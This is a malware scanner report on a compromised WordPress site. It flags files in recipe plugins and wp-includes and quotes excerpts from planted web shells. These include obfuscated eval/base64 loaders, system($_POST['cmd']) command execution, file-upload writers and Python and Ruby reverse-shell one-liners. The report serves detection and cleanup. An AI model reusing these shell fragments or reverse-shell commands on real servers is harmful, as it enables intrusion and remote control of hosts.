| Function eval Line: 39 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCf...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(gzinflate(base64_decode(rawurldecode('XZi1EvOGEkYfJ8moENOkEjOzmoxFFjM%2F%2FfXfXjcej0nS7n57jsrz0%2F%2BdfbaSwP4rynwqyr%2B%2F7zHm0zCv5bb931t%2FlerVDzuMDO8DuSGtMrPhx%2FeHV8xGUWyHP762wDkS2wTw9ppWNZaA0Y4ptGuDPmdoPOzWro9xNdoLPgDPOa5Z6Vrqx4%2F8%2BBS0%2FkLeXhaKgtYPtQPpfX5MrYznPa7SRQWG3AeguyEI%2B3mxkjh0zNbBg39k88H5fsP3VI9Z7kNsxRQq4w44Dba7JvqhY3LxFA3Qh5UMTz2MA32u8jjy1sWsHlx0bzA%2FnFPPmkaKMezjeva83lUEqDTvf%2Bx1rT%2B09dp4Xag92p3REvtCOBHLZMS%2B9DiPRUWdM%2FRcRFIkAsKJFpT7y1n7ZaG2TD39MMsK8GwrWkWBMlvtK2Z6yBj...
| Sign 11413268 Line: 39 Dangerous Malware Signature (hash: 11413268) | <?php eval(str_rot13
| Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc) | <?php <?php
eval
| Sign de12c454 Dangerous Malware Signature (hash: de12c454) | <?php vjaG
|
|
/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker-premium/addons-elite/index.php Size: 144.79 kB Created: 2022-01-20 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 19
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "PD9waHAKZnVuY3Rpb24gcHduKCRjbWRkKSB7CiAgICBnbG9iYWwgJGFiYywgJGhlbHBlciwgJGJhY2t0cmFjZTsKCiAgICBjbGFzcyBWdWxuIHsKICAgICAgICBwdWJsaWMgJGE7CiAgICAgICAgcHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKSB7IAogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgCiAgICAgICAgICAgIHVuc2V0KCR0aGlzLT5hKTsKICAgICAgICAgICAgJGJhY2t0cmFjZSA9IChuZXcgRXhjZXB0aW9uKS0+Z2V0VHJhY2UoKTsgIyA7KQogICAgICAgICAgICBpZighaXNzZXQoJGJhY2t0cmFjZVsxXVsnYXJncyddKSkgeyAjIFBIUCA+PSA3LjQKICAgICAgICAgICAgICAgICRiYWNrdHJhY2UgPSBkZWJ1Z19iYWNrdHJhY2UoKTsKICA...
| Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${${"GLOBALS"}["vmolgtof"]}=count(${${"GLOBALS"}["vcqqrlqbo"]});for(${$yienlc}=0;${${"GLOBALS"}["eqkvgoptfvkl"]}<${${"GLOBALS"}["ysjlzvro"]};${${"GLOBALS"}["rtolgl"]}++){${"GLOBALS"}["bpsfsqiel"]="fungsi";${${"GLOBALS"}["bpsfsqiel"]}[]=unx(${${"GLOBALS"}["vcqqrlqbo"]}[${${"GLOBALS"}["eqkvgoptfvkl"]}]);}if(isset($_GET["d"])){$lbcuxxaisydr="cdir";${"GLOBALS"}["ukbgkeds"]="fungsi";${${"GLOBALS"}["qqgfigbd"]}=unx($_GET["d"]);${${"GLOBALS"}["ukbgkeds"]}[14](${$lbcuxxaisydr});}else{${"GLOBALS"}["kussp...
| Exploit double_var2 Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$gfyfrcaij}
| Exploit escaped_path Line: 38 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x78ft\x61h\x73ho\x66n
| Exploit hex_char Line: 38 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 38 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42A\x4cS"}
| Exploit killall Dangerous RCE (Remote Code Execution) that allow remote attackers to kill processes on the target machine | <?php killall -9
| Function exec Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php exec(\"/bin/sh -i");};'");}else if($_POST["gecko-bc"]=="python"){${"GLOBALS"}["upnhvmssw"]="HostServer";echo cmd("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("".${${"GLOBALS"}["upnhvmssw"]}."",".${${"GLOBALS"}["mpogrnq"]}."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i\"]);'");}else if($_POST["gecko-bc"]=="ruby"){$ffzcwi="PortServer";echo cmd("ruby -rsocket -e'f=TCPSocket.open("".${$...
| Sign 00f56a27 Line: 38 Dangerous Malware Signature (hash: 00f56a27) | <?php ${${
| Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730) | <?php meta http-equiv="refresh" content="0;
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php Exploit
| Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268) | <?php exploit
| Sign 237750ea Line: 38 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 407651f7 Dangerous Malware Signature (hash: 407651f7) | <?php WScript.shell
| Sign 5b557546 Dangerous Malware Signature (hash: 5b557546) | <?php 65786563
| Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6) | <?php N5c3Rlb
| Sign 963e968a Dangerous Malware Signature (hash: 963e968a) | <?php PD9waH
| Sign a408f408 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
| Sign ae7830db Dangerous Malware Signature (hash: ae7830db) | <?php Y2hy
| Sign cbea68d7 Dangerous Malware Signature (hash: cbea68d7) | <?php 73797374656d
| Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e) | <?php Backdoor
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php zeXN0ZW
|
|
/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker-premium/templates/index.php Size: 70.40 kB Created: 2022-03-31 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 5 Dangers: 13
| Description | Match |
|---|
Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${${"GLOBALS"}["etolmuse"]}="FranzLennonCassano";${${"GLOBALS"}["ogkdrtnbif"]}="getcwd";${${"GLOBALS"}["bzlhlzfdgz"]}="file_get_contents";${${"GLOBALS"}["yafegfjsjhti"]}="file_put_contents";$mvkhfddraqt="mkd";${$qnglwqvcdbx}="rmdir";${${"GLOBALS"}["lpizqig"]}="unlink";${"GLOBALS"}["inlpdppymlr"]="paths";${$wfwwkxc}="system";${${"GLOBALS"}["dhmjnhiqki"]}="exec";${${"GLOBALS"}["ruugpys"]}="passthru";${${"GLOBALS"}["harmgmvh"]}="shell_exec";${$mvkhfddraqt}="mkdir";${"GLOBALS"}["fbbmimu"]="id";${${"...
| Exploit double_var2 Line: 43 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$kflgxkpc}
| Exploit escaped_path Line: 43 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x2est\x79le.\x62o\x72d
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php system($_POST["cmd"]." 2>&1")
| Exploit execution Line: 43 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php system($_POST["\x63m\x64"]." \x32>\x261")
| Exploit hacked_by Dangerous Hacker credits | <?php Hacked by
| Exploit hex_char Line: 43 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 43 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47L\x4f\x42\x41\x4c\x53"}
| Function posix_getpwuid Dangerous Encoded Function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid(fileowner("$path/$pathx"));${${"GLOBALS"}["qgyjvlyfsysv"]}=${${"GLOBALS"}["qgyjvlyfsysv"]}["name"];}else{$szluwcx="downer";${$szluwcx}=fileowner("$path/$pathx");}$htjgxmo="isd";${"GLOBALS"}["jbckuod"]="pathx";$tocdbstl="pathx";if(function_exists("posix_getgrgid")){$jdsywbgni="dgrp";${$jdsywbgni}=@posix_getgrgid(filegroup("$path/$pathx"));${${"GLOBALS"}["aqmflvwdj"]}=${${"GLOBALS"}["aqmflvwdj"]}["name"];}else{${"GLOBALS"}["mcfveorr"]="dgrp";${${"GLOBALS"}["mcfveorr"]}=filegroup("$p...
| Function posix_getpwuid Line: 43 Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid(fileowner("$path/$pathx"));${${"G\x4c\x4f\x42\x41\x4c\x53"}["q\x67\x79\x6a\x76\x6c\x79\x66\x73\x79sv"]}=${${"G\x4c\x4fB\x41\x4c\x53"}["\x71\x67\x79jv\x6c\x79f\x73\x79s\x76"]}["n\x61m\x65"];}else{$szluwcx="\x64\x6f\x77\x6eer";${$szluwcx}=fileowner("$path/$pathx");}$htjgxmo="\x69s\x64";${"\x47L\x4fB\x41\x4c\x53"}["\x6abc\x6b\x75\x6f\x64"]="\x70\x61\x74\x68\x78";$tocdbstl="\x70\x61\x74\x68x";if(function_exists("\x70os\x69x_ge\x74g\x72gi\x64")){$jdsywbgni="\x64g\x72p";${$jdsywbgni}=@p...
| Function system Line: 43 Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system($_POST["\x63m\x64"]." \x32>\x261");echo"\x3c/code\x3e\x3c/\x70re>\n \x20\x20\x20\x20\x20 \x20</\x74d\x3e\n\t\x3c/tr>\n\t\x3ct\x72\x3e\n \x20 \x20 \x20\x3c\x74\x64\x3e\n\x20\x20\x20 \x20\x20 \x20 \x20 \x20\x3cfo\x72\x6d m\x65t\x68o\x64\x3d'\x50OST\x27\x3e\n \x20\x20 \x20 \x20 \x20\x20\x3c\x74\x72\x3e<td\x3e<\x69npu\x74\x20t\x79\x70e\x3d\x27\x74\x65xt'\x20\x73t\x79\x6c\x65=\x27wid\x74\x68: \x31\x30\x30\x25;\x27\x20\x68\x65i\x67ht='\x310' \x6ea\x6de=\x27\x63md\x27\x20va\x6c\x75e=''\x20\x...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system($_POST["\x63m\x64"]." \x32>\x261");echo"\x3c/code\x3e\x3c/\x70re>\n \x20\x20\x20\x20\x20 \x20</\x74d\x3e\n\t\x3c/tr>\n\t\x3ct\x72\x3e\n \x20 \x20 \x20\x3c\x74\x64\x3e\n\x20\x20\x20 \x20\x20 \x20 \x20 \x20\x3cfo\x72\x6d m\x65t\x68o\x64\x3d'\x50OST\x27\x3e\n \x20\x20 \x20 \x20 \x20\x20\x3c\x74\x72\x3e<td\x3e<\x69npu\x74\x20t\x79\x70e\x3d\x27\x74\x65xt'\x20\x73t\x79\x6c\x65=\x27wid\x74\x68: \x31\x30\x30\x25;\x27\x20\x68\x65i\x67ht='\x310' \x6ea\x6de=\x27\x63md\x27\x20va\x6c\x75e=''\x20\x...
| Sign 00f56a27 Line: 43 Dangerous Malware Signature (hash: 00f56a27) | <?php ${${
| Sign 237750ea Line: 43 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41LS
| Sign 5aabe84e Line: 43 Dangerous Malware Signature (hash: 5aabe84e) | <?php system($_POST["
| Sign 963e968a Line: 43 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign ddf27cff Dangerous Malware Signature (hash: ddf27cff) | <?php system($_POST["cmd"]." 2>&1"
| Sign e996cf12 Line: 43 Dangerous Malware Signature (hash: e996cf12) | <?php ${$gfnccnr}(${${
|
|
/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker/dist/index.php Size: 28.32 kB Created: 2022-04-29 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Line: 38 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTA0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='
| Function eval Line: 38 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTA0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='))
| Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
|
|
/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker/includes/admin/menu/class-wprm-admin-menu.php Size: 4.06 kB Created: 2021-11-14 02:14:30 Modified: 2024-06-01 08:12:18 Warns: 1
| Description | Match |
|---|
Exploit base64_long Line: 28 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB4PSIwcHgiIHk9IjBweCIgd2lkdGg9IjI0cHgiIGhlaWdodD0iMjRweCIgdmlld0JveD0iMCAwIDI0IDI0Ij48ZyA+DQo8cGF0aCBmaWxsPSIjZmZmZmZmIiBkPSJNMTAsMEM5LjQsMCw5LDAuNCw5LDF2NEg3VjFjMC0wLjYtMC40LTEtMS0xUzUsMC40LDUsMXY0SDNWMWMwLTAuNi0wLjQtMS0xLTFTMSwwLjQsMSwxdjhjMCwxLjcsMS4zLDMsMywzDQp2MTBjMCwxLjEsMC45LDIsMiwyczItMC45LDItMlYxMmMxLjcsMCwzLTEuMywzLTNWMUMxMSwwLjQsMTAuNiwwLDEwLDB6Ii8+DQo8cGF0aCBkYXRhLWNvbG9yPSJ...
|
|
/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker/includes/public/shortcodes/class-wprm-shortcode-helper.php Size: 13.29 kB Created: 2021-11-14 02:14:30 Modified: 2024-06-01 08:12:18 Dangers: 1
| Description | Match |
|---|
Sign 91535293 Line: 175 Dangerous Malware Signature (hash: 91535293) | <?php ls-la
|
|
/custdata02/turtle/public_html/recipes/wp-content/maintenance/assets/fonts/index.php Size: 13.20 kB Created: 2022-08-14 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit escaped_path Line: 41 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x2bGeE\x415\x63vxI\x42wJe
| Function eval Line: 42 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))))
|
|
/custdata02/turtle/public_html/recipes/wp-includes/SimplePie/Parse/Date.php Size: 20.07 kB Created: 2020-05-01 14:26:07 Modified: 2024-06-01 08:12:19 Warns: 1
| Description | Match |
|---|
Exploit concat_vars_with_spaces Line: 837 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code | <?php $day . $fws . $month . $fws . $year . $fws .
|
|
/custdata02/turtle/public_html/recipes/wp-includes/Requests/src/Auth/mah.php Size: 51.87 kB Created: 2022-07-12 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'IHJlZWJlX2VyY2JlZ3ZhdChSX05ZWV5SX0FCR1ZQUik7cXJzdmFyKCfLpvgnLCAnjScpOyRUWUJPTllGW8um+F0gPSBya2N5YnFyKCd8BHwEfAInLCB0bXZhc3luZ3IoZmhvZmdlKCcfiwgAAAAAAAAKLJ3XjttDZ1KBIF8TPrC3VBaJvWq+BOy9iJ1RPj6cOB7YcBmQKN57zj54VrSmLi4kesb/+c/36z/+/Sn+17/vKIxP72L8/2JO/74jOYqiOAr/u/XffhT3//6aJnhOYP+dF9mUF//+6YBlZj+8x+LJ/tq/8G86Tw3pTMHqs/dgflhY3e9UQZWWGfHd+urvo83O6nXjBzYw5ZIQg0o06jNJZCAXqy9I0vkblDQgVT42H82IdhdqovmLfgmmWAh6eiNL+/CxKP9gXFyqvo82OZ6lTo2JMjeCl5vhnsLGoUc1HqF3YBmCqb/voCBMFF2RVGg6kdi+jDpsEt5VY+WrsVNVzCPLRqO...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($HCdot($Ztvaw('IHJlZWJlX2VyY2JlZ3ZhdChSX05ZWV5SX0FCR1ZQUik7cXJzdmFyKCfLpvgnLCAnjScpOyRUWUJPTllGW8um+F0gPSBya2N5YnFyKCd8BHwEfAInLCB0bXZhc3luZ3IoZmhvZmdlKCcfiwgAAAAAAAAKLJ3XjttDZ1KBIF8TPrC3VBaJvWq+BOy9iJ1RPj6cOB7YcBmQKN57zj54VrSmLi4kesb/+c/36z/+/Sn+17/vKIxP72L8/2JO/74jOYqiOAr/u/XffhT3//6aJnhOYP+dF9mUF//+6YBlZj+8x+LJ/tq/8G86Tw3pTMHqs/dgflhY3e9UQZWWGfHd+urvo83O6nXjBzYw5ZIQg0o06jNJZCAXqy9I0vkblDQgVT42H82IdhdqovmLfgmmWAh6eiNL+/CxKP9gXFyqvo82OZ6lTo2JMjeCl5vhnsLGoUc1HqF3YBmCqb/voCBMFF2RVGg6kdi+jDps...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/recipes/wp-includes/Requests/src/Proxy/index.php Size: 77.33 kB Created: 2022-04-07 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 6
| Description | Match |
|---|
Exploit execution Line: 1089 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php base64_decode($_GET['zip'])
| Exploit execution Line: 1100 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php base64_decode($_GET['gz'])
| Exploit execution Line: 1123 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php base64_decode($_GET['decompress'])
| Exploit execution Line: 1138 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php base64_decode($_GET['gzfile'])
| Exploit execution Line: 680 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php base64_decode($_GET['img'])
| Exploit execution Line: 697 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php base64_decode($_GET['download'])
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connecti...
|
|
/custdata02/turtle/public_html/recipes/wp-includes/Requests/src/Utility/index.php Size: 1.91 kB Created: 2022-08-07 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit eval_base64 Line: 115 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine | <?php eval(base64_decode($body)
| Exploit execution Line: 115 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(base64_decode($body)
| Function eval Line: 115 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(base64_decode($body))
| Sign 11413268 Line: 115 Dangerous Malware Signature (hash: 11413268) | <?php eval(base64_decode(
|
|
/custdata02/turtle/public_html/recipes/wp-includes/css/dist/list-reusable-blocks/index.php Size: 29.94 kB Created: 2022-01-25 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 2
| Description | Match |
|---|
Function strrev eval_strrev Line: 594 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
| Sign 963e968a Line: 552 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/turtle/public_html/recipes/wp-includes/css/dist/components/network.php Size: 28.81 kB Created: 2022-03-09 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 7
| Description | Match |
|---|
Exploit double_var Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${${"\x47\x4c\x4fB\x41\x4cS"}["\x66\x67g\x6a\x6eu\x6dq\x63"]}){$cndixwvne="\x6b\x65\x79";$_POST[${$cndixwvne}]=stripslashes(${${"\x47L\x4fB\x41\x4c\x53"}["\x66ggj\x6e\x75m\x71\x63"]});}}echo"<\x21DOC\x54YPE \x48\x54M\x4c\x3e\n<\x68\x74m\x6c>\n\x3ch\x65\x61d\x3e\n<l\x69nk\x20h\x72e\x66=\x22\x68\x74\x74p\x73://f\x6f\x6e\x74\x73\x2eg\x6fog\x6c\x65\x61p\x69s\x2ec\x6fm/c\x73s?\x66\x61\x6d\x69\x6cy\x3dEx\x6f\"\x20\x72\x65\x6c\x3d\x22s\x74y\x6ces\x68\x65\x65\x74\" \x74y\x70\x65\x3d\"\x74e\x78\x74/css\x...
| Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${${"GLOBALS"}["fggjnumqc"]}){$cndixwvne="key";$_POST[${$cndixwvne}]=stripslashes(${${"GLOBALS"}["fggjnumqc"]});}}echo"<!DOCTYPE HTML>\n<html>\n<head>\n<link href="https://fonts.googleapis.com/css?family=Exo\" rel="stylesheet\" type=\"text/css">\n<link href="\" rel="stylesheet" type="text/css">\n<title>SEA-GHOST MINSHELL</title>\n<link href="https://i.ibb.co/9VYB4QP/IMG-20200417-WA0014.jpg\" rel=\"icon\" type=\"image/x-icon">\n<style>\nhtml { \n background-color: #000d2a;\n -webkit-background-si...
| Exploit double_var2 Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$qhybyg}
| Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(${$bcwxmerpebv},$_POST["src"])
| Exploit download_remote_code2 Line: 38 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(${$bcwxmerpebv},$_POST["s\x72c"])
| Exploit escaped_path Line: 38 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x78e\x7aj\x65n\x70f
| Exploit hex_char Line: 38 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 38 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}
| Sign 00f56a27 Line: 38 Dangerous Malware Signature (hash: 00f56a27) | <?php ${${
| Sign 237750ea Line: 38 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
|
|
/custdata02/turtle/public_html/recipes/wp-includes/css/dist/block-editor/index.php Size: 17.15 kB Created: 2021-09-30 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2
| Description | Match |
|---|
Function eval Line: 41 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(htmlspecialchars_decode(urldecode(base64_decode($unknown))))
| Sign ae7830db Line: 39 Dangerous Malware Signature (hash: ae7830db) | <?php YmFzZTY0
| Sign d97f004d Line: 39 Dangerous Malware Signature (hash: d97f004d) | <?php Z3ppbmZsYXRl
|
|
/custdata02/turtle/public_html/recipes/wp-includes/css/dist/preferences/index.php Size: 142.33 kB Created: 2022-04-30 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 14
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "ZWNobyAnDQo8IURPQ1RZUEUgSFRNTD4NCjxodG1sPjxoZWFkPjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5kb2N1bWVudC53cml0ZSgiXHUwMDNDXHUwMDZDXHUwMDY5XHUwMDZFXHUwMDZCXHUwMDIwXHUwMDY4XHUwMDcyXHUwMDY1XHUwMDY2XHUwMDNEXHUwMDIyXHUwMDIyXHUwMDIwXHUwMDcyXHUwMDY1XHUwMDZDXHUwMDNEXHUwMDIyXHUwMDczXHUwMDc0XHUwMDc5XHUwMDZDXHUwMDY1XHUwMDczXHUwMDY4XHUwMDY1XHUwMDY1XHUwMDc0XHUwMDIyXHUwMDIwXHUwMDc0XHUwMDc5XHUwMDcwXHUwMDY1XHUwMDNEXHUwMDIyXHUwMDc0XHUwMDY1XHUwMDc4XHUwMDc0XHUwMDJGXHUwMDYzXHUwMDczXHUwMDczXHUwMDIyXHUwMDNFXHUwMDBBXHU...
| Exploit hex_char Line: 42 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Line: 44 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($function($tex7ure))
| Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730) | <?php mdW5jdGlvb
| Sign 7186bb8d Dangerous Malware Signature (hash: 7186bb8d) | <?php RfUE9TV
| Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6) | <?php NvcH
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php JF9QT1NU
| Sign 91535293 Dangerous Malware Signature (hash: 91535293) | <?php lY2hv
| Sign a408f408 Dangerous Malware Signature (hash: a408f408) | <?php cmVwbGFjZ
| Sign ae7830db Dangerous Malware Signature (hash: ae7830db) | <?php Y29we
| Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e) | <?php ByaW50Z
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZWNob
| Sign de12c454 Dangerous Malware Signature (hash: de12c454) | <?php VjaG
| Sign e6546205 Dangerous Malware Signature (hash: e6546205) | <?php kX1BPU1
| Sign ee1cb326 Dangerous Malware Signature (hash: ee1cb326) | <?php 9wZW
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php "base64_decode"
|
|
/custdata02/turtle/public_html/recipes/wp-includes/class-snoopy.php Size: 36.83 kB Created: 2023-03-30 07:11:38 Modified: 2024-06-01 08:12:19 Warns: 1
| Description | Match |
|---|
